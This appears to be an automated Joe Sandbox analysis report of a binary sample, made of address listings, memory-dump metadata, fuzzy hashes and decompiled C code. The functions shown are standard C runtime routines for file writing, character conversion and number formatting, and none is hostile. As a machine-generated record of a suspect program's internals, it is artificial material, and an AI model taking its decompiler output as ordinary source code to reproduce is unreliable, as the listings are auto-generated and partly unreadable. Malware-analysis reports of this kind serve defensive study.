                                                                                                                                                                                                        0x00405ddd
                                                                                                                                                                                                        0x00405de5
                                                                                                                                                                                                        0x00405de7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405ded
                                                                                                                                                                                                        0x00405ded
                                                                                                                                                                                                        0x00405df0
                                                                                                                                                                                                        0x00405df7
                                                                                                                                                                                                        0x00405df7
                                                                                                                                                                                                        0x00405de7
                                                                                                                                                                                                        0x00405dc1
                                                                                                                                                                                                        0x00405d3a
                                                                                                                                                                                                        0x00405d3c
                                                                                                                                                                                                        0x00405d3e
                                                                                                                                                                                                        0x00405d3e
                                                                                                                                                                                                        0x00405d43
                                                                                                                                                                                                        0x00405e79
                                                                                                                                                                                                        0x00405e7a
                                                                                                                                                                                                        0x00405e7a
                                                                                                                                                                                                        0x00405e7e
                                                                                                                                                                                                        0x00405d49
                                                                                                                                                                                                        0x00405d4d
                                                                                                                                                                                                        0x00405d77
                                                                                                                                                                                                        0x00405d79
                                                                                                                                                                                                        0x00405da7
                                                                                                                                                                                                        0x00405dac
                                                                                                                                                                                                        0x00405d7b
                                                                                                                                                                                                        0x00405d80
                                                                                                                                                                                                        0x00405d80
                                                                                                                                                                                                        0x00405d87
                                                                                                                                                                                                        0x00405d89
                                                                                                                                                                                                        0x00405d89
                                                                                                                                                                                                        0x00405d91
                                                                                                                                                                                                        0x00405d96
                                                                                                                                                                                                        0x00405d9b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405da1
                                                                                                                                                                                                        0x00405da5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405da5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d80
                                                                                                                                                                                                        0x00405d4f
                                                                                                                                                                                                        0x00405d54
                                                                                                                                                                                                        0x00405d59
                                                                                                                                                                                                        0x00405d5c
                                                                                                                                                                                                        0x00405d61
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d67
                                                                                                                                                                                                        0x00405d6f
                                                                                                                                                                                                        0x00405d74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00405d74
                                                                                                                                                                                                        0x00405d61
                                                                                                                                                                                                        0x00405d4d
                                                                                                                                                                                                        0x00405d43
                                                                                                                                                                                                        0x00405d38
                                                                                                                                                                                                        0x00405d20
                                                                                                                                                                                                        0x00405d14
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 208892515-0
                                                                                                                                                                                                        • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                        • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                                        			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t61;
                                                                                                                                                                                                        				signed int _t63;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        				signed int _t69;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        				signed int _t75;
                                                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                                        				signed int _t98;
                                                                                                                                                                                                        				signed int _t99;
                                                                                                                                                                                                        				intOrPtr* _t100;
                                                                                                                                                                                                        				void* _t101;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t90 = __edx;
                                                                                                                                                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t100 = _a16;
                                                                                                                                                                                                        					_t105 = _t100;
                                                                                                                                                                                                        					if(_t100 != 0) {
                                                                                                                                                                                                        						_t82 = _a4;
                                                                                                                                                                                                        						__eflags = _t82;
                                                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = _t59 | 0xffffffff;
                                                                                                                                                                                                        						_t90 = _t63 % _a8;
                                                                                                                                                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                                                                                                                                                        						if(__eflags > 0) {
                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t97 = _a8 * _a12;
                                                                                                                                                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                                                                                        						_v8 = _t82;
                                                                                                                                                                                                        						_v16 = _t97;
                                                                                                                                                                                                        						_t81 = _t97;
                                                                                                                                                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                        							_v12 = 0x1000;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_v12 =  *(_t100 + 0x18);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t97;
                                                                                                                                                                                                        						if(_t97 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							return _a12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                                                                                        								__eflags = _t84;
                                                                                                                                                                                                        								if(_t84 == 0) {
                                                                                                                                                                                                        									L18:
                                                                                                                                                                                                        									__eflags = _t81 - _v12;
                                                                                                                                                                                                        									if(_t81 < _v12) {
                                                                                                                                                                                                        										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                                                                                                                                                        										__eflags = _t68 - 0xffffffff;
                                                                                                                                                                                                        										if(_t68 == 0xffffffff) {
                                                                                                                                                                                                        											L34:
                                                                                                                                                                                                        											_t69 = _t97;
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											return (_t69 - _t81) / _a8;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_v8 = _v8 + 1;
                                                                                                                                                                                                        										_t72 =  *(_t100 + 0x18);
                                                                                                                                                                                                        										_t81 = _t81 - 1;
                                                                                                                                                                                                        										_v12 = _t72;
                                                                                                                                                                                                        										__eflags = _t72;
                                                                                                                                                                                                        										if(_t72 <= 0) {
                                                                                                                                                                                                        											_v12 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags = _t84;
                                                                                                                                                                                                        									if(_t84 == 0) {
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										__eflags = _v12;
                                                                                                                                                                                                        										_t98 = _t81;
                                                                                                                                                                                                        										if(_v12 != 0) {
                                                                                                                                                                                                        											_t75 = _t81;
                                                                                                                                                                                                        											_t90 = _t75 % _v12;
                                                                                                                                                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                                                                                                                                                        											__eflags = _t98;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push(_t98);
                                                                                                                                                                                                        										_push(_v8);
                                                                                                                                                                                                        										_push(E0040FA20(_t90, _t98, _t100));
                                                                                                                                                                                                        										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                                                                                        										_t101 = _t101 + 0xc;
                                                                                                                                                                                                        										__eflags = _t74 - 0xffffffff;
                                                                                                                                                                                                        										if(_t74 == 0xffffffff) {
                                                                                                                                                                                                        											L36:
                                                                                                                                                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                        											_t69 = _v16;
                                                                                                                                                                                                        											goto L35;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t88 = _t98;
                                                                                                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                                                                                                        											if(_t74 <= _t98) {
                                                                                                                                                                                                        												_t88 = _t74;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_v8 = _v8 + _t88;
                                                                                                                                                                                                        											_t81 = _t81 - _t88;
                                                                                                                                                                                                        											__eflags = _t74 - _t98;
                                                                                                                                                                                                        											if(_t74 < _t98) {
                                                                                                                                                                                                        												goto L36;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												L27:
                                                                                                                                                                                                        												_t97 = _v16;
                                                                                                                                                                                                        												goto L31;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t77 = E0040C1FB(_t100);
                                                                                                                                                                                                        									__eflags = _t77;
                                                                                                                                                                                                        									if(_t77 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t78 =  *(_t100 + 4);
                                                                                                                                                                                                        								__eflags = _t78;
                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                        									goto L18;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									_t48 = _t100 + 0xc;
                                                                                                                                                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                                                                                        									__eflags =  *_t48;
                                                                                                                                                                                                        									goto L34;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t99 = _t81;
                                                                                                                                                                                                        								__eflags = _t81 - _t78;
                                                                                                                                                                                                        								if(_t81 >= _t78) {
                                                                                                                                                                                                        									_t99 = _t78;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                                                                                        								 *_t100 =  *_t100 + _t99;
                                                                                                                                                                                                        								_t101 = _t101 + 0xc;
                                                                                                                                                                                                        								_t81 = _t81 - _t99;
                                                                                                                                                                                                        								_v8 = _v8 + _t99;
                                                                                                                                                                                                        								goto L27;
                                                                                                                                                                                                        								L31:
                                                                                                                                                                                                        								__eflags = _t81;
                                                                                                                                                                                                        							} while (_t81 != 0);
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L3:
                                                                                                                                                                                                        					_t61 = E0040BFC1(_t105);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					 *_t61 = 0x16;
                                                                                                                                                                                                        					E0040E744(_t90, 0, _t100);
                                                                                                                                                                                                        					goto L4;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





























                                                                                                                                                                                                        0x0040bbe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb2a
                                                                                                                                                                                                        0x0040bb2a
                                                                                                                                                                                                        0x0040bb2d
                                                                                                                                                                                                        0x0040bb2d
                                                                                                                                                                                                        0x0040bb33
                                                                                                                                                                                                        0x0040bb64
                                                                                                                                                                                                        0x0040bb64
                                                                                                                                                                                                        0x0040bb67
                                                                                                                                                                                                        0x0040bbc0
                                                                                                                                                                                                        0x0040bbc7
                                                                                                                                                                                                        0x0040bbca
                                                                                                                                                                                                        0x0040bbf5
                                                                                                                                                                                                        0x0040bbf5
                                                                                                                                                                                                        0x0040bbf7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbfb
                                                                                                                                                                                                        0x0040bbcc
                                                                                                                                                                                                        0x0040bbcf
                                                                                                                                                                                                        0x0040bbd2
                                                                                                                                                                                                        0x0040bbd3
                                                                                                                                                                                                        0x0040bbd6
                                                                                                                                                                                                        0x0040bbd8
                                                                                                                                                                                                        0x0040bbda
                                                                                                                                                                                                        0x0040bbda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbd8
                                                                                                                                                                                                        0x0040bb69
                                                                                                                                                                                                        0x0040bb6b
                                                                                                                                                                                                        0x0040bb78
                                                                                                                                                                                                        0x0040bb78
                                                                                                                                                                                                        0x0040bb7c
                                                                                                                                                                                                        0x0040bb7e
                                                                                                                                                                                                        0x0040bb82
                                                                                                                                                                                                        0x0040bb84
                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                        0x0040bb87
                                                                                                                                                                                                        0x0040bb89
                                                                                                                                                                                                        0x0040bb8a
                                                                                                                                                                                                        0x0040bb94
                                                                                                                                                                                                        0x0040bb95
                                                                                                                                                                                                        0x0040bb9a
                                                                                                                                                                                                        0x0040bb9d
                                                                                                                                                                                                        0x0040bba0
                                                                                                                                                                                                        0x0040bc03
                                                                                                                                                                                                        0x0040bc03
                                                                                                                                                                                                        0x0040bc07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bba2
                                                                                                                                                                                                        0x0040bba2
                                                                                                                                                                                                        0x0040bba4
                                                                                                                                                                                                        0x0040bba6
                                                                                                                                                                                                        0x0040bba8
                                                                                                                                                                                                        0x0040bba8
                                                                                                                                                                                                        0x0040bbaa
                                                                                                                                                                                                        0x0040bbad
                                                                                                                                                                                                        0x0040bbaf
                                                                                                                                                                                                        0x0040bbb1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbb3
                                                                                                                                                                                                        0x0040bbb1
                                                                                                                                                                                                        0x0040bba0
                                                                                                                                                                                                        0x0040bb6e
                                                                                                                                                                                                        0x0040bb74
                                                                                                                                                                                                        0x0040bb76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb76
                                                                                                                                                                                                        0x0040bb35
                                                                                                                                                                                                        0x0040bb38
                                                                                                                                                                                                        0x0040bb3a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb3c
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbf1
                                                                                                                                                                                                        0x0040bb42
                                                                                                                                                                                                        0x0040bb44
                                                                                                                                                                                                        0x0040bb46
                                                                                                                                                                                                        0x0040bb48
                                                                                                                                                                                                        0x0040bb48
                                                                                                                                                                                                        0x0040bb50
                                                                                                                                                                                                        0x0040bb55
                                                                                                                                                                                                        0x0040bb58
                                                                                                                                                                                                        0x0040bb5a
                                                                                                                                                                                                        0x0040bb5d
                                                                                                                                                                                                        0x0040bb5f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bbe1
                                                                                                                                                                                                        0x0040bbe1
                                                                                                                                                                                                        0x0040bbe1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040bb2a
                                                                                                                                                                                                        0x0040bb24
                                                                                                                                                                                                        0x0040bac8
                                                                                                                                                                                                        0x0040bac8
                                                                                                                                                                                                        0x0040bacd
                                                                                                                                                                                                        0x0040bace
                                                                                                                                                                                                        0x0040bacf
                                                                                                                                                                                                        0x0040bad0
                                                                                                                                                                                                        0x0040bad1
                                                                                                                                                                                                        0x0040bad2
                                                                                                                                                                                                        0x0040bad8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040badd

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                                                                                                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                                                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                                                                                                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3240763771-0
                                                                                                                                                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				char _t43;
                                                                                                                                                                                                        				char _t46;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t57;
                                                                                                                                                                                                        				int _t58;
                                                                                                                                                                                                        				signed short* _t59;
                                                                                                                                                                                                        				short* _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char* _t72;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 = _a8;
                                                                                                                                                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if( *_t72 != 0) {
                                                                                                                                                                                                        						E0040EC86( &_v20, _a16);
                                                                                                                                                                                                        						_t43 = _v20;
                                                                                                                                                                                                        						__eflags =  *(_t43 + 0x14);
                                                                                                                                                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                                                                                                                                                        							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                                                                                                                                                        							__eflags = _t46;
                                                                                                                                                                                                        							if(_t46 == 0) {
                                                                                                                                                                                                        								__eflags = _a4;
                                                                                                                                                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									L10:
                                                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                                                        										_t53 = _v12;
                                                                                                                                                                                                        										_t11 = _t53 + 0x70;
                                                                                                                                                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        										__eflags =  *_t11;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									return 1;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L21:
                                                                                                                                                                                                        								_t54 = E0040BFC1(__eflags);
                                                                                                                                                                                                        								 *_t54 = 0x2a;
                                                                                                                                                                                                        								__eflags = _v8;
                                                                                                                                                                                                        								if(_v8 != 0) {
                                                                                                                                                                                                        									_t54 = _v12;
                                                                                                                                                                                                        									_t33 = _t54 + 0x70;
                                                                                                                                                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        									__eflags =  *_t33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return _t54 | 0xffffffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t56 = _v20;
                                                                                                                                                                                                        							_t65 =  *(_t56 + 0xac);
                                                                                                                                                                                                        							__eflags = _t65 - 1;
                                                                                                                                                                                                        							if(_t65 <= 1) {
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                                                                                        								if(__eflags < 0) {
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = _t72[1];
                                                                                                                                                                                                        								if(__eflags == 0) {
                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L19:
                                                                                                                                                                                                        								_t57 =  *(_t56 + 0xac);
                                                                                                                                                                                                        								__eflags = _v8;
                                                                                                                                                                                                        								if(_v8 == 0) {
                                                                                                                                                                                                        									return _t57;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                                                                                        								return _t57;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _a12 - _t65;
                                                                                                                                                                                                        							if(_a12 < _t65) {
                                                                                                                                                                                                        								goto L17;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _a4;
                                                                                                                                                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                                                                                        							__eflags = _t58;
                                                                                                                                                                                                        							_t56 = _v20;
                                                                                                                                                                                                        							if(_t58 != 0) {
                                                                                                                                                                                                        								goto L19;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							goto L17;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t59 = _a4;
                                                                                                                                                                                                        						__eflags = _t59;
                                                                                                                                                                                                        						if(_t59 != 0) {
                                                                                                                                                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t60 = _a4;
                                                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                                                        							 *_t60 = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415355
                                                                                                                                                                                                        0x00415355
                                                                                                                                                                                                        0x0041535b
                                                                                                                                                                                                        0x0041535e
                                                                                                                                                                                                        0x004152cc
                                                                                                                                                                                                        0x004152cc
                                                                                                                                                                                                        0x00415367
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415367
                                                                                                                                                                                                        0x00415320
                                                                                                                                                                                                        0x00415323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415327
                                                                                                                                                                                                        0x00415338
                                                                                                                                                                                                        0x0041533e
                                                                                                                                                                                                        0x00415340
                                                                                                                                                                                                        0x00415343
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00415343
                                                                                                                                                                                                        0x004152e0
                                                                                                                                                                                                        0x004152e3
                                                                                                                                                                                                        0x004152e5
                                                                                                                                                                                                        0x004152eb
                                                                                                                                                                                                        0x004152eb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004152bb
                                                                                                                                                                                                        0x004152bb
                                                                                                                                                                                                        0x004152c0
                                                                                                                                                                                                        0x004152c4
                                                                                                                                                                                                        0x004152c4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004152c0
                                                                                                                                                                                                        0x004152b9

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.401764735.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        • Associated: 00000005.00000002.401764735.000000000044D000.00000040.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_kGO12fD60.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                                                        • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                        • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t25 = _a16;
                                                                                                                                                                                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                                                                                                                        					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t25 - 0x66;
                                                                                                                                                                                                        					if(_t25 != 0x66) {
                                                                                                                                                                                                        						__eflags = _t25 - 0x61;
                                                                                                                                                                                                        						if(_t25 == 0x61) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							__eflags = _t25 - 0x41;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L7;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						return _t26;
                                                                                                                                                                                                        					} else {
